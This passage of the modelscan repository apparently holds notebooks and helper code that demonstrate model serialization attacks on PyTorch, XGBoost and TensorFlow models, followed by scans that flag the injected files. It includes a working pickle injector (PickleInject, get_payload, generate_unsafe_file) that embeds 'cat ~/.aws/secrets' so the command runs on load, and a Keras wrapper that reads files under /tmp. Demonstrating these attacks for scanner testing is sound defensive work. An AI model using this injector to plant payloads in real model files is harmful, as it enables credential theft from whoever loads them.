files scanned, and any issues if found. For the safe model scanned, modelscan finds no model serialization attacks, as expected." 137 | ] 138 | }, 139 | { 140 | "cell_type": "code", 141 | "execution_count": 7, 142 | "metadata": {}, 143 | "outputs": [ 144 | { 145 | "name": "stdout", 146 | "output_type": "stream", 147 | "text": [ 148 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. \n", 149 | "\n", 150 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/safe_model.pt:safe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 151 | "\n", 152 | "\u001b[34m--- Summary ---\u001b[0m\n", 153 | "\n", 154 | "\u001b[32m No issues found! 🎉\u001b[0m\n" 155 | ] 156 | } 157 | ], 158 | "source": [ 159 | "!modelscan --path PyTorchModels/safe_model.pt" 160 | ] 161 | }, 162 | { 163 | "cell_type": "markdown", 164 | "metadata": {}, 165 | "source": [ 166 | "# Model Serialization Attack\n", 167 | "\n", 168 | "Here malicious code is injected in the safe model to read aws secret keys. The unsafe model is saved at `./PyTorchModels/unsafe_model.pt`" 169 | ] 170 | }, 171 | { 172 | "cell_type": "code", 173 | "execution_count": 8, 174 | "metadata": {}, 175 | "outputs": [], 176 | "source": [ 177 | "command = \"system\"\n", 178 | "malicious_code = \"\"\"cat ~/.aws/secrets\n", 179 | " \"\"\"\n", 180 | "\n", 181 | "unsafe_model_path = os.path.join(model_directory, \"unsafe_model.pt\")\n", 182 | "\n", 183 | "payload = get_payload(command, malicious_code)\n", 184 | "torch.save(\n", 185 | " torch.load(safe_model_path),\n", 186 | " f=unsafe_model_path,\n", 187 | " pickle_module=PickleInject([payload]),\n", 188 | ")" 189 | ] 190 | }, 191 | { 192 | "cell_type": "markdown", 193 | "metadata": {}, 194 | "source": [ 195 | "# Unsafe Model Prediction\n", 196 | "\n", 197 | "The malicious code injected in the unsafe model gets executed when it is loaded. The aws secret keys are displayed. 
\n", 198 | "\n", 199 | "Also, the unsafe model predicts the sentiments just as well as safe model i.e., the code injection attack will not impact the model performance. The unaffected performance of unsafe models makes the ML models an effective attack vector. \n" 200 | ] 201 | }, 202 | { 203 | "cell_type": "code", 204 | "execution_count": 9, 205 | "metadata": {}, 206 | "outputs": [ 207 | { 208 | "name": "stderr", 209 | "output_type": "stream", 210 | "text": [ 211 | "aws_access_key_id=\n", 212 | "aws_secret_access_key=\n", 213 | "The overall sentiment is: negative with a score of: 85.9%\n" 214 | ] 215 | } 216 | ], 217 | "source": [ 218 | "predict_sentiment(\"Stock market was bearish today\", torch.load(unsafe_model_path))" 219 | ] 220 | }, 221 | { 222 | "cell_type": "markdown", 223 | "metadata": {}, 224 | "source": [ 225 | "# Scan Unsafe Model\n", 226 | "\n", 227 | "The scan results include information on the files scanned, and any issues if found. In this case, a critical severity level issue is found in the unsafe model scanned. \n", 228 | "\n", 229 | "modelscan also outlines the found operator(s) and module(s) deemed unsafe. " 230 | ] 231 | }, 232 | { 233 | "cell_type": "code", 234 | "execution_count": 10, 235 | "metadata": {}, 236 | "outputs": [ 237 | { 238 | "name": "stdout", 239 | "output_type": "stream", 240 | "text": [ 241 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. 
\n", 242 | "\n", 243 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 244 | "\n", 245 | "\u001b[34m--- Summary ---\u001b[0m\n", 246 | "\n", 247 | "Total Issues: \u001b[1;36m1\u001b[0m\n", 248 | "\n", 249 | "Total Issues By Severity:\n", 250 | "\n", 251 | " - LOW: \u001b[1;32m0\u001b[0m\n", 252 | " - MEDIUM: \u001b[1;32m0\u001b[0m\n", 253 | " - HIGH: \u001b[1;32m0\u001b[0m\n", 254 | " - CRITICAL: \u001b[1;36m1\u001b[0m\n", 255 | "\n", 256 | "\u001b[34m--- Issues by Severity ---\u001b[0m\n", 257 | "\n", 258 | "\u001b[34m--- CRITICAL ---\u001b[0m\n", 259 | "\n", 260 | "Unsafe operator found:\n", 261 | " - Severity: CRITICAL\n", 262 | " - Description: Use of unsafe operator 'system' from module 'posix'\n", 263 | " - Source: /Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl\n" 264 | ] 265 | } 266 | ], 267 | "source": [ 268 | "!modelscan --path ./PyTorchModels/unsafe_model.pt" 269 | ] 270 | }, 271 | { 272 | "cell_type": "markdown", 273 | "metadata": {}, 274 | "source": [ 275 | "# Reporting Format\n", 276 | "ModelScan can report scan results in console (default), json, or custom report (to be defined by user in settings-file). For mode details, please see: ` modelscan -h` " 277 | ] 278 | }, 279 | { 280 | "cell_type": "markdown", 281 | "metadata": {}, 282 | "source": [ 283 | "## JSON Report\n", 284 | "\n", 285 | "For JSON reporting: `modelscan -p ./path-to/file -r json -o output-file-name.json` " 286 | ] 287 | }, 288 | { 289 | "cell_type": "code", 290 | "execution_count": 11, 291 | "metadata": {}, 292 | "outputs": [ 293 | { 294 | "name": "stdout", 295 | "output_type": "stream", 296 | "text": [ 297 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. 
\n", 298 | "\n", 299 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 300 | "\u001b[1m{\u001b[0m\u001b[32m\"modelscan_version\"\u001b[0m: \u001b[32m\"0.5.0\"\u001b[0m, \u001b[32m\"timestamp\"\u001b[0m: \u001b[32m\"2024-01-25T17:10:54.306065\"\u001b[0m, \n", 301 | "\u001b[32m\"input_path\"\u001b[0m: \n", 302 | "\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt\"\u001b[0m\n", 303 | ", \u001b[32m\"total_issues\"\u001b[0m: \u001b[1;36m1\u001b[0m, \u001b[32m\"summary\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"total_issues_by_severity\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"LOW\"\u001b[0m: \u001b[1;36m0\u001b[0m, \n", 304 | "\u001b[32m\"MEDIUM\"\u001b[0m: \u001b[1;36m0\u001b[0m, \u001b[32m\"HIGH\"\u001b[0m: \u001b[1;36m0\u001b[0m, \u001b[32m\"CRITICAL\"\u001b[0m: \u001b[1;36m1\u001b[0m\u001b[1m}\u001b[0m\u001b[1m}\u001b[0m, \u001b[32m\"issues_by_severity\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"CRITICAL\"\u001b[0m: \n", 305 | "\u001b[1m[\u001b[0m\u001b[1m{\u001b[0m\u001b[32m\"description\"\u001b[0m: \u001b[32m\"Use of unsafe operator 'system' from module 'posix'\"\u001b[0m, \n", 306 | "\u001b[32m\"operator\"\u001b[0m: \u001b[32m\"system\"\u001b[0m, \u001b[32m\"module\"\u001b[0m: \u001b[32m\"posix\"\u001b[0m, \u001b[32m\"source\"\u001b[0m: \n", 307 | "\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt:\u001b[0m\n", 308 | "\u001b[32munsafe_model/data.pkl\"\u001b[0m, \u001b[32m\"scanner\"\u001b[0m: \u001b[32m\"modelscan.scanners.PickleUnsafeOpScan\"\u001b[0m\u001b[1m}\u001b[0m\u001b[1m]\u001b[0m\u001b[1m}\u001b[0m, \n", 309 | "\u001b[32m\"errors\"\u001b[0m: \u001b[1m[\u001b[0m\u001b[1m]\u001b[0m, \u001b[32m\"scanned\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"total_scanned\"\u001b[0m: \u001b[1;36m1\u001b[0m, \u001b[32m\"scanned_files\"\u001b[0m: \n", 310 | 
class PickleInject:
    """Pickle injection. Pretends to be a "module" to work with torch."""

    def __init__(self, inj_objs, first=True):
        # torch.save probes ``pickle_module.__name__``.
        self.__name__ = "pickle_inject"
        self.inj_objs = inj_objs
        self.first = first

    class _Pickler(pickle._Pickler):
        """Reimplementation of Pickler with support for injection"""

        def __init__(self, file, protocol, inj_objs, first=True):
            super().__init__(file, protocol)
            self.inj_objs = inj_objs
            self.first = first

        def dump(self, obj):
            """Pickle data, inject object before or after"""
            # Mirrors CPython's pickle.Pickler.dump() preamble.
            if self.proto >= 2:
                self.write(pickle.PROTO + struct.pack("<B", self.proto))
            if self.proto >= 4:
                self.framer.start_framing()

            # Inject the object(s) before the user-supplied data?
            if self.first:
                # Pickle injected objects
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)

            # Pickle user-supplied data
            self.save(obj)

            # Inject the object(s) after the user-supplied data?
            if not self.first:
                # Pickle injected objects
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)

            self.write(pickle.STOP)
            self.framer.end_framing()

    def Pickler(self, file, protocol):
        # Initialise the pickler interface with the injected object(s).
        # BUG FIX: propagate ``self.first`` so the before/after injection
        # order is honoured when used through torch.save (previously the
        # flag was silently dropped and injection always happened first).
        return self._Pickler(file, protocol, self.inj_objs, self.first)

    class _PickleInject:
        """Base class for pickling injected commands"""

        def __init__(self, args, command=None):
            self.command = command
            self.args = args

        def __reduce__(self):
            # Unpickling executes command(args) — this is the injection.
            return self.command, (self.args,)

    class System(_PickleInject):
        """Create os.system command"""

        def __init__(self, args):
            super().__init__(args, command=os.system)

    class Exec(_PickleInject):
        """Create exec command"""

        def __init__(self, args):
            super().__init__(args, command=exec)

    class Eval(_PickleInject):
        """Create eval command"""

        def __init__(self, args):
            super().__init__(args, command=eval)

    class RunPy(_PickleInject):
        """Create runpy command"""

        def __init__(self, args):
            import runpy

            super().__init__(args, command=runpy._run_code)

        def __reduce__(self):
            # runpy._run_code requires an explicit globals dict argument.
            return self.command, (self.args, {})


def get_payload(
    command: str, malicious_code: str
) -> "PickleInject.System | PickleInject.Exec | PickleInject.Eval | PickleInject.RunPy":
    """
    Get the payload based on the command and malicious code provided.

    Args:
        command: The command to execute.
        malicious_code: The malicious code to inject.

    Returns:
        The payload object based on the command.

    Raises:
        ValueError: If an invalid command is provided.
    """
    if command == "system":
        payload = PickleInject.System(malicious_code)
    elif command == "exec":
        payload = PickleInject.Exec(malicious_code)
    elif command == "eval":
        payload = PickleInject.Eval(malicious_code)
    elif command == "runpy":
        payload = PickleInject.RunPy(malicious_code)
    else:
        raise ValueError("Invalid command provided.")

    return payload


def generate_unsafe_file(
    safe_model, command: str, malicious_code: str, unsafe_model_path: str
) -> None:
    """Serialize ``safe_model`` to ``unsafe_model_path`` with an injected payload.

    Args:
        safe_model: Any picklable object to serialize.
        command: Payload kind ("system", "exec", "eval" or "runpy").
        malicious_code: The code/command string the payload will run on load.
        unsafe_model_path: Destination file path.
    """
    payload = get_payload(command, malicious_code)
    pickle_protocol = 4
    # BUG FIX: a context manager guarantees the file handle is closed even if
    # pickling raises (previously the handle leaked on error).
    with open(unsafe_model_path, "wb") as file_for_unsafe_model:
        mypickler = PickleInject._Pickler(
            file_for_unsafe_model, pickle_protocol, [payload]
        )
        mypickler.dump(safe_model)
scipy.special import softmax 6 | import csv 7 | import urllib.request 8 | import torch 9 | 10 | SENTIMENT_TASK: Final[str] = "sentiment" 11 | 12 | 13 | def _preprocess(text: str) -> str: 14 | """ 15 | Preprocess the given text by replacing usernames starting with '@' with '@user' 16 | and replacing URLs starting with 'http' with 'http'. 17 | 18 | Args: 19 | text: The input text to be preprocessed. 20 | 21 | Returns: 22 | The preprocessed text. 23 | """ 24 | new_text: list[str] = [] 25 | 26 | for t in text.split(" "): 27 | t = "@user" if t.startswith("@") and len(t) > 1 else t 28 | t = "http" if t.startswith("http") else t 29 | new_text.append(t) 30 | return " ".join(new_text) 31 | 32 | 33 | def download_model(safe_model_path: str) -> None: 34 | """ 35 | Download a pre-trained model and saves it to the specified path. 36 | 37 | Args: 38 | safe_model_path: The path where the model will be saved. 39 | """ 40 | pretrained_model_name = f"cardiffnlp/twitter-roberta-base-{SENTIMENT_TASK}" 41 | model = AutoModelForSequenceClassification.from_pretrained(pretrained_model_name) 42 | torch.save(model, safe_model_path) 43 | 44 | 45 | def predict_sentiment(text: str, model: Any) -> None: 46 | """ 47 | Predict the sentiment of a given text using a pre-trained sentiment analysis model. 48 | 49 | Args: 50 | text: The input text to analyze. 51 | model: The sentiment analysis model. 
class MaliciousModule(tf.keras.Model):
    """Demo of a TensorFlow serialization attack: wraps a benign Keras model
    and adds filesystem side effects to its forward pass, so saving/loading
    the wrapper smuggles the malicious ops into the SavedModel graph."""

    def __init__(self, safe_model):
        super(MaliciousModule, self).__init__()
        # The wrapped, benign model; predictions are delegated to it unchanged.
        self.model = safe_model

    @tf.function(
        input_signature=[tf.TensorSpec(shape=(None, 28, 28), dtype=tf.float32)]
    )
    def call(self, x):
        """Run the wrapped model, then exfiltrate files via TF file ops.

        The @tf.function decorator traces these ops into the graph, so they
        execute on every inference after the model is loaded from disk.
        """
        # Some model prediction logic
        res = self.model(x)

        # Write a file (demonstrates arbitrary writes from inside the graph)
        tf.io.write_file(
            "/tmp/aws_secret.txt",
            "aws_access_key_id=\naws_secret_access_key=",
        )

        # Enumerate and dump every .txt file in /tmp (demonstrates reads).
        list_ds = tf.data.Dataset.list_files("/tmp/*.txt", shuffle=False)

        for file in list_ds:
            tf.print("File found: " + file)
            tf.print(tf.io.read_file(file))

        return res
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt

# Silence TF deprecation/info chatter in notebook output.
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)


# Human-readable labels for the 10 Fashion-MNIST classes, indexed by class id.
class_names = [
    "T-shirt/top",
    "Trouser",
    "Pullover",
    "Dress",
    "Coat",
    "Sandal",
    "Shirt",
    "Sneaker",
    "Bag",
    "Ankle boot",
]


def get_data(test_data_only=False):
    """Load Fashion-MNIST with pixel values scaled to [0, 1].

    Args:
        test_data_only: If True, return only (test_images, test_labels);
            otherwise return (train_images, train_labels, test_images, test_labels).
    """
    fashion_mnist = tf.keras.datasets.fashion_mnist
    (train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
    # Scale uint8 pixel values [0, 255] down to floats in [0, 1].
    train_images = train_images / 255.0
    test_images = test_images / 255.0

    if test_data_only:
        return test_images, test_labels
    else:
        return train_images, train_labels, test_images, test_labels


def plot_image(pred, img):
    """Render a single 28x28 image with its predicted label as the x-axis text."""
    plt.grid(False)
    plt.xticks([])
    plt.yticks([])

    plt.imshow(img, cmap=plt.cm.binary)
    plt.xlabel("{}".format(pred), color="blue")


def train_model():
    """Train a small dense classifier on Fashion-MNIST and return it.

    Returns:
        A compiled, fitted tf.keras.Sequential model (final Softmax layer,
        so outputs are probabilities, hence from_logits=False below).
    """
    model = tf.keras.Sequential(
        [
            tf.keras.layers.Flatten(input_shape=(28, 28)),
            tf.keras.layers.Dense(128, activation="relu"),
            tf.keras.layers.Dense(10),
            tf.keras.layers.Softmax(),
        ]
    )

    model.compile(
        optimizer="adam",
        loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),
        metrics=["accuracy"],
    )

    train_images, train_labels, test_images, test_labels = get_data()

    model.fit(train_images, train_labels, epochs=10)

    _, test_acc = model.evaluate(test_images, test_labels, verbose=1)

    print("\nModel trained with test accuracy:", test_acc)

    return model
def plot_predictions(number_of_predictions, test_data, model_predictions):
    """Render each test image with its predicted label in a 1-row subplot grid."""
    for index in range(0, number_of_predictions):
        plt.subplot(1, number_of_predictions, index + 1)
        plot_image(model_predictions[index], test_data[index])


# --- notebooks/utils/xgboost_diabetes_model.py ---


def get_data():
    """Load the PIMA Indians diabetes CSV and return a train/test split.

    Returns:
        (x_train, x_test, y_train, y_test) with a fixed 67/33 split.
    """
    # Path is relative to the notebooks/ working directory.
    dataset = loadtxt("utils/pima-indians-diabetes.csv", delimiter=",")
    X = dataset[:, 0:8]  # first 8 columns: features
    Y = dataset[:, 8]  # last column: diabetes label (0/1)
    # split data into train and test sets
    seed = 7  # fixed seed so the split (and results) are reproducible
    test_size = 0.33
    x_train, x_test, y_train, y_test = train_test_split(
        X, Y, test_size=test_size, random_state=seed
    )

    return x_train, x_test, y_train, y_test


def train_model():
    """Fit an XGBClassifier on the training split and return the model."""
    x_train, _, y_train, _ = get_data()
    # fit the model on the training data
    model = XGBClassifier()
    model.fit(x_train, y_train)
    return model
{y_test[0:number_of_predictions]}") 34 | -------------------------------------------------------------------------------- /notebooks/xgboost_diabetes_classification.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "id": "bd852ab1", 6 | "metadata": {}, 7 | "source": [ 8 | "# Setup" 9 | ] 10 | }, 11 | { 12 | "cell_type": "code", 13 | "execution_count": 1, 14 | "id": "00052a84", 15 | "metadata": {}, 16 | "outputs": [ 17 | { 18 | "name": "stdout", 19 | "output_type": "stream", 20 | "text": [ 21 | "modelscan, version 0.5.0\n" 22 | ] 23 | } 24 | ], 25 | "source": [ 26 | "!pip install -q modelscan\n", 27 | "!modelscan -v" 28 | ] 29 | }, 30 | { 31 | "cell_type": "code", 32 | "execution_count": 2, 33 | "id": "eb656ce5", 34 | "metadata": {}, 35 | "outputs": [], 36 | "source": [ 37 | "!pip install -q xgboost==1.7.6\n", 38 | "!pip install -U -q scikit-learn==1.3.0" 39 | ] 40 | }, 41 | { 42 | "cell_type": "code", 43 | "execution_count": 3, 44 | "id": "06e8fc79", 45 | "metadata": {}, 46 | "outputs": [], 47 | "source": [ 48 | "import pickle\n", 49 | "from pathlib import Path\n", 50 | "import os\n", 51 | "import numpy as np\n", 52 | "from utils.pickle_codeinjection import generate_unsafe_file\n", 53 | "from utils.xgboost_diabetes_model import train_model, get_predictions" 54 | ] 55 | }, 56 | { 57 | "cell_type": "markdown", 58 | "id": "063dd649", 59 | "metadata": {}, 60 | "source": [ 61 | "# Save a XGBoost Model\n", 62 | "\n", 63 | "The model is trained on a diabetes dataset, and predicts whether a person has diabetes or not. The dataset can be found here: [Link to PIMA Indian diabetes dataset](https://www.kaggle.com/datasets/uciml/pima-indians-diabetes-database). 
The model is saved at ```./XGBoostModels/safe_model.pkl```" 64 | ] 65 | }, 66 | { 67 | "cell_type": "code", 68 | "execution_count": 4, 69 | "id": "015f415a", 70 | "metadata": {}, 71 | "outputs": [], 72 | "source": [ 73 | "model_directory = os.path.join(os.getcwd(), \"XGBoostModels\")\n", 74 | "if not os.path.isdir(model_directory):\n", 75 | " os.mkdir(model_directory)\n", 76 | "\n", 77 | "safe_model_path_pickle = os.path.join(model_directory, \"safe_model.pkl\")\n", 78 | "model = train_model()\n", 79 | "with open(safe_model_path_pickle, \"wb\") as fo:\n", 80 | " pickle.dump(model, fo)" 81 | ] 82 | }, 83 | { 84 | "cell_type": "markdown", 85 | "id": "51812303", 86 | "metadata": {}, 87 | "source": [ 88 | "# Predict using Safe Model" 89 | ] 90 | }, 91 | { 92 | "cell_type": "code", 93 | "execution_count": 5, 94 | "id": "8b8d0327", 95 | "metadata": {}, 96 | "outputs": [ 97 | { 98 | "name": "stdout", 99 | "output_type": "stream", 100 | "text": [ 101 | "The model predicts: [0, 1, 1]\n", 102 | "The true labels are: [0. 1. 1.]\n" 103 | ] 104 | } 105 | ], 106 | "source": [ 107 | "number_of_predictions = 3\n", 108 | "get_predictions(number_of_predictions, model)" 109 | ] 110 | }, 111 | { 112 | "cell_type": "markdown", 113 | "id": "fff6510d", 114 | "metadata": {}, 115 | "source": [ 116 | "# Scan the safe model\n", 117 | "\n", 118 | "The scan results include information on the files scanned, and any issues if found. For the safe model scanned, modelscan finds no code injections in it, as expected." 119 | ] 120 | }, 121 | { 122 | "cell_type": "code", 123 | "execution_count": 6, 124 | "id": "ccfeee08", 125 | "metadata": {}, 126 | "outputs": [ 127 | { 128 | "name": "stdout", 129 | "output_type": "stream", 130 | "text": [ 131 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. 
\n", 132 | "\n", 133 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/safe_model.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 134 | "\n", 135 | "\u001b[34m--- Summary ---\u001b[0m\n", 136 | "\n", 137 | "\u001b[32m No issues found! 🎉\u001b[0m\n" 138 | ] 139 | } 140 | ], 141 | "source": [ 142 | "!modelscan -p XGBoostModels/safe_model.pkl" 143 | ] 144 | }, 145 | { 146 | "cell_type": "markdown", 147 | "id": "985410d3", 148 | "metadata": {}, 149 | "source": [ 150 | "# Model Serialization Attack\n", 151 | "\n", 152 | "Here code is injected in the safe model to read aws secret keys. The unsafe model is saved at ```./XGBoostModels/unsafe_model.pkl```" 153 | ] 154 | }, 155 | { 156 | "cell_type": "code", 157 | "execution_count": 7, 158 | "id": "d0e70069", 159 | "metadata": {}, 160 | "outputs": [], 161 | "source": [ 162 | "# Inject code with the command\n", 163 | "command = \"system\"\n", 164 | "malicious_code = \"\"\"cat ~/.aws/secrets\n", 165 | " \"\"\"" 166 | ] 167 | }, 168 | { 169 | "cell_type": "code", 170 | "execution_count": 8, 171 | "id": "7bde73cd", 172 | "metadata": {}, 173 | "outputs": [], 174 | "source": [ 175 | "with open(safe_model_path_pickle, \"rb\") as fo:\n", 176 | " safe_model_pickle = pickle.load(fo)\n", 177 | "\n", 178 | "unsafe_model_path = os.path.join(model_directory, \"unsafe_model.pkl\")\n", 179 | "generate_unsafe_file(model, command, malicious_code, unsafe_model_path)" 180 | ] 181 | }, 182 | { 183 | "cell_type": "markdown", 184 | "id": "1798152e", 185 | "metadata": {}, 186 | "source": [ 187 | "# Predict using Unsafe Model\n", 188 | "\n", 189 | "The malicious code gets executed when the model is loaded. The aws secret keys are displayed. \n", 190 | "\n", 191 | "Also, the unsafe model predicts just as well as safe model i.e., the code injection attack will not impact the model performance. The unaffected performance of unsafe models makes the ML models an effective attack vector. 
" 192 | ] 193 | }, 194 | { 195 | "cell_type": "code", 196 | "execution_count": 9, 197 | "id": "49d6c62f", 198 | "metadata": {}, 199 | "outputs": [ 200 | { 201 | "name": "stdout", 202 | "output_type": "stream", 203 | "text": [ 204 | "aws_access_key_id=\n", 205 | "aws_secret_access_key=\n", 206 | "The model predicts: [0, 1, 1]\n", 207 | "The true labels are: [0. 1. 1.]\n" 208 | ] 209 | } 210 | ], 211 | "source": [ 212 | "with open(unsafe_model_path, \"rb\") as fo:\n", 213 | " unsafe_model = pickle.load(fo)\n", 214 | "\n", 215 | "get_predictions(number_of_predictions, unsafe_model)" 216 | ] 217 | }, 218 | { 219 | "cell_type": "markdown", 220 | "id": "72584048", 221 | "metadata": {}, 222 | "source": [ 223 | "# Scan the Unsafe Model\n", 224 | "\n", 225 | "The scan results include information on the files scanned, and any issues if found. In this case, a critical severity level issue is found in the unsafe model scanned. \n", 226 | "\n", 227 | "modelscan also outlines the found operator(s) and module(s) deemed unsafe. " 228 | ] 229 | }, 230 | { 231 | "cell_type": "code", 232 | "execution_count": 10, 233 | "id": "9ee3393e", 234 | "metadata": {}, 235 | "outputs": [ 236 | { 237 | "name": "stdout", 238 | "output_type": "stream", 239 | "text": [ 240 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. 
\n", 241 | "\n", 242 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 243 | "\n", 244 | "\u001b[34m--- Summary ---\u001b[0m\n", 245 | "\n", 246 | "Total Issues: \u001b[1;36m1\u001b[0m\n", 247 | "\n", 248 | "Total Issues By Severity:\n", 249 | "\n", 250 | " - LOW: \u001b[1;32m0\u001b[0m\n", 251 | " - MEDIUM: \u001b[1;32m0\u001b[0m\n", 252 | " - HIGH: \u001b[1;32m0\u001b[0m\n", 253 | " - CRITICAL: \u001b[1;36m1\u001b[0m\n", 254 | "\n", 255 | "\u001b[34m--- Issues by Severity ---\u001b[0m\n", 256 | "\n", 257 | "\u001b[34m--- CRITICAL ---\u001b[0m\n", 258 | "\n", 259 | "Unsafe operator found:\n", 260 | " - Severity: CRITICAL\n", 261 | " - Description: Use of unsafe operator 'system' from module 'posix'\n", 262 | " - Source: /Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl\n" 263 | ] 264 | } 265 | ], 266 | "source": [ 267 | "!modelscan -p XGBoostModels/unsafe_model.pkl" 268 | ] 269 | }, 270 | { 271 | "cell_type": "markdown", 272 | "id": "9a908243", 273 | "metadata": {}, 274 | "source": [ 275 | "# Reporting Format\n", 276 | "ModelScan can report scan results in console (default), JSON, or custom report (to be defined by user in settings-file). For mode details, please see: ` modelscan -h` " 277 | ] 278 | }, 279 | { 280 | "cell_type": "markdown", 281 | "id": "7ff858af", 282 | "metadata": {}, 283 | "source": [ 284 | "## JSON Report\n", 285 | "\n", 286 | "For JSON reporting: `modelscan -p ./path-to/file -r json -o output-file-name.json` " 287 | ] 288 | }, 289 | { 290 | "cell_type": "code", 291 | "execution_count": 11, 292 | "id": "6df55b3e", 293 | "metadata": {}, 294 | "outputs": [ 295 | { 296 | "name": "stdout", 297 | "output_type": "stream", 298 | "text": [ 299 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. 
\n", 300 | "\n", 301 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 302 | "\u001b[1m{\u001b[0m\u001b[32m\"modelscan_version\"\u001b[0m: \u001b[32m\"0.5.0\"\u001b[0m, \u001b[32m\"timestamp\"\u001b[0m: \u001b[32m\"2024-01-25T17:56:00.855056\"\u001b[0m, \n", 303 | "\u001b[32m\"input_path\"\u001b[0m: \n", 304 | "\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl\u001b[0m\n", 305 | "\u001b[32m\"\u001b[0m, \u001b[32m\"total_issues\"\u001b[0m: \u001b[1;36m1\u001b[0m, \u001b[32m\"summary\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"total_issues_by_severity\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"LOW\"\u001b[0m: \u001b[1;36m0\u001b[0m, \n", 306 | "\u001b[32m\"MEDIUM\"\u001b[0m: \u001b[1;36m0\u001b[0m, \u001b[32m\"HIGH\"\u001b[0m: \u001b[1;36m0\u001b[0m, \u001b[32m\"CRITICAL\"\u001b[0m: \u001b[1;36m1\u001b[0m\u001b[1m}\u001b[0m\u001b[1m}\u001b[0m, \u001b[32m\"issues_by_severity\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"CRITICAL\"\u001b[0m: \n", 307 | "\u001b[1m[\u001b[0m\u001b[1m{\u001b[0m\u001b[32m\"description\"\u001b[0m: \u001b[32m\"Use of unsafe operator 'system' from module 'posix'\"\u001b[0m, \n", 308 | "\u001b[32m\"operator\"\u001b[0m: \u001b[32m\"system\"\u001b[0m, \u001b[32m\"module\"\u001b[0m: \u001b[32m\"posix\"\u001b[0m, \u001b[32m\"source\"\u001b[0m: \n", 309 | "\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl\u001b[0m\n", 310 | "\u001b[32m\"\u001b[0m, \u001b[32m\"scanner\"\u001b[0m: \u001b[32m\"modelscan.scanners.PickleUnsafeOpScan\"\u001b[0m\u001b[1m}\u001b[0m\u001b[1m]\u001b[0m\u001b[1m}\u001b[0m, \u001b[32m\"errors\"\u001b[0m: \u001b[1m[\u001b[0m\u001b[1m]\u001b[0m, \n", 311 | "\u001b[32m\"scanned\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"total_scanned\"\u001b[0m: \u001b[1;36m1\u001b[0m, \u001b[32m\"scanned_files\"\u001b[0m: \n", 312 | 
"\u001b[1m[\u001b[0m\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pk\u001b[0m\n", 313 | "\u001b[32ml\"\u001b[0m\u001b[1m]\u001b[0m\u001b[1m}\u001b[0m\u001b[1m}\u001b[0m\n" 314 | ] 315 | } 316 | ], 317 | "source": [ 318 | "# This will save the scan results in file: xgboost-model-scan-results.json\n", 319 | "!modelscan --path XGBoostModels/unsafe_model.pkl -r json -o xgboost-model-scan-results.json" 320 | ] 321 | } 322 | ], 323 | "metadata": { 324 | "kernelspec": { 325 | "display_name": "Python 3.10.13 ('py310')", 326 | "language": "python", 327 | "name": "python3" 328 | }, 329 | "language_info": { 330 | "codemirror_mode": { 331 | "name": "ipython", 332 | "version": 3 333 | }, 334 | "file_extension": ".py", 335 | "mimetype": "text/x-python", 336 | "name": "python", 337 | "nbconvert_exporter": "python", 338 | "pygments_lexer": "ipython3", 339 | "version": "3.10.13" 340 | }, 341 | "vscode": { 342 | "interpreter": { 343 | "hash": "bd638e2064d9001d4ca93bc8e56e039dad230900dd235e8a6196f1614960903a" 344 | } 345 | } 346 | }, 347 | "nbformat": 4, 348 | "nbformat_minor": 5 349 | } 350 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [tool.poetry] 2 | name = "modelscan" 3 | version = "0.0.0" 4 | description = "The modelscan package is a cli tool for detecting unsafe operations in model files across various model serialization formats." 
